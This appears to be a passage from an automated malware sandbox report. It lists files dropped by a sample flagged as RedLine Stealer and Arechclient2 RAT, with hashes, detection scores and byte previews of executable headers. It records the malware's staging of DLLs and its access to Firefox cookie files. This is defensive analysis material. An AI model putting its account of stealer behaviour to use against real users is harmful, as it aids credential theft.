File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	786944
Entropy (8bit):	6.809298494568767
Encrypted:	false
SSDEEP:	12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
MD5:	5AEBA331CE853D10C82B56ADC96C9E80
SHA1:	A208059F9591712ABF451114815B693AB14A5AB3
SHA-256:	EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
SHA-512:	5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\jwjqeqx, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\jwjqeqx, Author: Joe Security Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\jwjqeqx, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}.....0........... ....X..{M.....0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

C:\Users\user\AppData\Local\Temp\tmpD3E6.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5ek.0.exe

Download File

Process:	C:\Users\user\Desktop\wxfSIz4PAi.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	312320
Entropy (8bit):	6.527939405036737
Encrypted:	false
SSDEEP:	3072:5uv4t7jzTpsqDgLYiR+dH6kVtJ3hwg38hM8JKsNuGheh9OlsrxGMrp8nQJGESXF9:5lXgV9OpsM8JI2eaMr8QJGfXAK
MD5:	ACAAA65D3F174EBF3595E23522837B43
SHA1:	9A6F1CA6F103591E453B991BA0EC7FBA37863E63
SHA-256:	8EA615668614745E60720FE0FBB6FEBF8CC9DFDD374F70AB7542132F86BF0EC2
SHA-512:	5007C93E32211E7CE24089FAD1160720F0DC187CCD7F32BF2E3C0F66A080B7D6D5AFB8C62E367C2EE422F43763C07E065E1790054F3AFD0DD6B3A7F45C94D1F8
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ku.[Ku.[Ku.[F'e[Uu.[F'Z[.u.[F'[[du.[B.)[Hu.[Ku.[;u.[.._[Ju.[F'a[Ju.[..d[Ju.[RichKu.[................PE..L...&.>e.............................@.......0....@.................................]...........................................(....@...i......................L....2..8...............................@............0...............................text............................... ..`.rdata...m...0...n..................@..@.data...............................@....rsrc....i...@...j...D..............@..@.reloc..L...........................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5ek.1.zip

Download File

Process:	C:\Users\user\Desktop\wxfSIz4PAi.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3884863
Entropy (8bit):	7.9982714074161665
Encrypted:	true
SSDEEP:	98304:7goFFJ7lj6j1elkeoTNxPxDZhAryYACWcTIxlN+ba:7guJ7wpfTDPxD0P2YG
MD5:	78D3CA6355C93C72B494BB6A498BF639
SHA1:	2FA4E5DF74BFE75C207C881A1B0D3BC1C62C8B0E
SHA-256:	A1DD547A63B256AA6A16871ED03F8B025226F7617E67B8817A08444DF077B001
SHA-512:	1B2DF7BEE2514AEE7EFD3579F5DD33C76B40606D07DBA69A34C45747662FAD61174DB4931BCA02B058830107959205E889FEE74F8CCC9F6E03F9FD111761F4EA
Malicious:	false
Preview:	PK.........?.X........I......bunch.dat\]...:.... "...T.......N<wf..X $;.e..)....\|u]+...UV.~.....f.Rje.......@.f.r..V....J-.#U.....=.T..E.5.Z..&..z...'.k..%..Je.....[5.....P..B...@........G..z[.-B1....Jz#....%.J...j...W........>62.jK(...........E.T.Q}.j._I..R.TEj.>..O..:J%o.......`.f+O...W>.....S.INC.m.6..\|wQ.xk.K.....o.D....:.n4....P>..M._\|...P.R@.gW...k..X...MbM.....H....... .....#o.CC.!...1!R.g....Qc "P....Q.3.H.B.F.\|...)...........@..W.6..Z..7.9.....d'`_.6.zr%a......7.,...l....h.v......P.O.f..!..Y..#..Y.7..g..v=..k....J...N#\.5.....]......<.VGU.~....,..X.o.k..#..?v..%.0.+...m.(m..ah.JG>.....m..V......kb...B.jX...V$p... ..?.<....^...%KA=0\.(......Q.l>.;x..#W.@@.tIU ...Q............./e.7Ew..}h..^N... ........+.........bRz.........2r.f..u'o..s.}1...j.{.'%.......?..Z..M.....9.\|P..W.o...c...3....H\.4..B......;14.65.Q3....24$...2(..9j......!.$..<<....P#b..Lj.D.vG.+.}.T..6tR..b."..o.f...h>.......Z..5.(....]........

C:\Users\user\AppData\Local\Temp\u5ek.2\UIxMarketPlugin.dll

Download File

Process:	C:\Users\user\Desktop\wxfSIz4PAi.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1640960
Entropy (8bit):	6.484662993855079
Encrypted:	false
SSDEEP:	49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
MD5:	D1BA9412E78BFC98074C5D724A1A87D6
SHA1:	0572F98D78FB0B366B5A086C2A74CC68B771D368
SHA-256:	CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
SHA-512:	8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5ek.2\bunch.dat

Download File

Process:	C:\Users\user\Desktop\wxfSIz4PAi.exe
File Type:	data
Category:	dropped
Size (bytes):	1329417
Entropy (8bit):	7.898171122766659
Encrypted:	false
SSDEEP:	24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
MD5:	1E8237D3028AB52821D69099E0954F97
SHA1:	30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
SHA-256:	9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
SHA-512:	A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
Malicious:	false
Preview:	...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O

C:\Users\user\AppData\Local\Temp\u5ek.2\relay.dll

Download File

Process:	C:\Users\user\Desktop\wxfSIz4PAi.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1596416
Entropy (8bit):	6.46619614175955
Encrypted:	false
SSDEEP:	49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
MD5:	10D51BECD0BBCE0FAB147FF9658C565E
SHA1:	4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
SHA-256:	7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
SHA-512:	29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..\|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe

Download File

Process:	C:\Users\user\Desktop\wxfSIz4PAi.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2469936
Entropy (8bit):	6.434916453080517
Encrypted:	false
SSDEEP:	49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
MD5:	9FB4770CED09AAE3B437C1C6EB6D7334
SHA1:	FE54B31B0DB8665AA5B22BED147E8295AFC88A03
SHA-256:	A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
SHA-512:	140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]..<...<...<...D...<...J...<...J).A<...J(..=...D...<...<...?...J,..=...J...<...J...<..Rich.<..........................PE..L... .kU..........................................@..........................0&......&&...@.................................H. ......0"...............%.0 ...."..K...................................C..@...............,..... .@....................text............................... ..`.rdata...=.......>..................@..@.data....-....!....... .............@....rsrc........0".......!.............@..@.reloc...N...."..P...@".............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5ek.2\whale.dbf

Download File

Process:	C:\Users\user\Desktop\wxfSIz4PAi.exe
File Type:	data
Category:	dropped
Size (bytes):	87278
Entropy (8bit):	4.38402884518968
Encrypted:	false
SSDEEP:	1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
MD5:	A723BF46048E0BFB15B8D77D7A648C3E
SHA1:	8952D3C34E9341E4425571E10F22B782695BB915
SHA-256:	B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
SHA-512:	CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
Malicious:	false
Preview:	......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t

C:\Users\user\AppData\Local\Temp\u5ek.3.exe

Download File

Process:	C:\Users\user\Desktop\wxfSIz4PAi.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4866096
Entropy (8bit):	6.542818068158205
Encrypted:	false
SSDEEP:	49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
MD5:	397926927BCA55BE4A77839B1C44DE6E
SHA1:	E10F3434EF3021C399DBBA047832F02B3C898DBD
SHA-256:	4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
SHA-512:	CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......\|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................

C:\Users\user\AppData\Local\Temp\xtfky

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	786944
Entropy (8bit):	6.809298494568767
Encrypted:	false
SSDEEP:	12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
MD5:	5AEBA331CE853D10C82B56ADC96C9E80
SHA1:	A208059F9591712ABF451114815B693AB14A5AB3
SHA-256:	EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
SHA-512:	5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\xtfky, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\xtfky, Author: Joe Security Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\xtfky, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 65%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}.....0........... ....X..{M.....0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1640960
Entropy (8bit):	6.484662993855079
Encrypted:	false
SSDEEP:	49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
MD5:	D1BA9412E78BFC98074C5D724A1A87D6
SHA1:	0572F98D78FB0B366B5A086C2A74CC68B771D368
SHA-256:	CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
SHA-512:	8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\bunch.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1329417
Entropy (8bit):	7.898171122766659
Encrypted:	false
SSDEEP:	24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
MD5:	1E8237D3028AB52821D69099E0954F97
SHA1:	30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
SHA-256:	9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
SHA-512:	A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
Malicious:	false
Preview:	...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O

C:\Users\user\AppData\Roaming\SecureClient\relay.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1596416
Entropy (8bit):	6.46619614175955
Encrypted:	false
SSDEEP:	49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
MD5:	10D51BECD0BBCE0FAB147FF9658C565E
SHA1:	4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
SHA-256:	7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
SHA-512:	29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..\|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\whale.dbf

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	87278
Entropy (8bit):	4.38402884518968
Encrypted:	false
SSDEEP:	1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
MD5:	A723BF46048E0BFB15B8D77D7A648C3E
SHA1:	8952D3C34E9341E4425571E10F22B782695BB915
SHA-256:	B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
SHA-512:	CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
Malicious:	false
Preview:	......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468130964551318
Encrypted:	false
